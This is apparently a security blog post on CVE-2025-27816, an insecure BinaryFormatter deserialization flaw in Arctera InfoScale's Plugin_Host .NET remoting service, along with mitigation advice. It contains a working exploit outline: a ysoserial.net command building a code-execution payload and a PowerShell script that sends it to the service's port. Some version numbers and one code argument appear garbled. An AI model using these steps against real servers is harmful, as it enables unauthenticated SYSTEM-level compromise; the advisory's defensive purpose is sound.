In early 2025, security researchers discovered a serious vulnerability tracked as CVE-2025-27816 in Arctera InfoScale versions 7. through 8..2. This flaw comes from insecure deserialization in a .NET remoting endpoint. If left unaddressed, it can let remote, unauthenticated attackers execute malicious code on affected systems.
This post will explain what’s going on, how exploitation works, and—most importantly—what you can do to keep your servers safe.
Plugin_Host.exe exposes a .NET Remoting endpoint over the network.
- Problem: The service accepts serialized messages and doesn’t check if they’re malicious—making it a classic *insecure deserialization* case.
- Result: An attacker on your network can send crafted data to this endpoint and make the service run whatever code they want with Local System privileges.
2. How Does Deserialization Work?
.NET apps often send objects between processes (or over the network) by “serializing” them to bytes and “deserializing” them back. If you deserialize user data without checking it, bad things can happen.
The vulnerable code in InfoScale looks something like this (simplified)
// Example of insecure object deserialization
public object ReceiveMessage(Stream incoming)
{
BinaryFormatter formatter = new BinaryFormatter();
object message = formatter.Deserialize(incoming); // DANGER: input not trusted!
return message;
}
If attackers control what's in incoming, and the server uses BinaryFormatter, they can send evil .NET objects that execute code during deserialization.
*See Microsoft docs: BinaryFormatter Security Guide*
Building a Payload
Bad actors can easily abuse existing exploitation tools like ysoserial.net to create a serialized payload that spawns a calculator (or worse, a backdoor shell).
Command example
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "calc.exe" > payload.bin
A simple exploit in PowerShell might look like this (*don’t run on production!*)
$client = New-Object System.Net.Sockets.TcpClient("target-server",909)
$stream = $client.GetStream()
$payload = [System.IO.File]::ReadAllBytes("payload.bin")
$stream.Write($payload, , $payload.Length)
$stream.Close()
$client.Close()
If successful, this will run calc.exe on the victim server as SYSTEM.
No authentication required: Works if a vulnerable DR endpoint is exposed on your network.
- Affected versions: InfoScale 7. through 8..2, all Windows servers with Plugin_Host running and DR enabled.
Short Term
If you’re not using DR:
Command-line version
sc stop Plugin_Host
sc config Plugin_Host start= disabled
References & Further Reading
- CVE-2025-27816 on NVD
- Arctera InfoScale Vendor Advisory
- Microsoft: Security risks of BinaryFormatter
- ysoserial.net: .NET Payload Generation
- OWASP: Deserialization of Untrusted Data
Final Words
CVE-2025-27816 is a serious reminder that exposing serialization endpoints to untrusted networks is always dangerous, especially in Windows services running as SYSTEM.
If you don’t need DR, turn off Plugin_Host.
If you do, patch as soon as possible and limit network exposure.
Stay safe! 🚨
> *If you have questions or more details on the vulnerability, leave a comment below or contact your InfoScale security support team!*
Timeline
Published on: 03/07/2025 08:15:44 UTC
Last modified on: 03/07/2025 20:15:38 UTC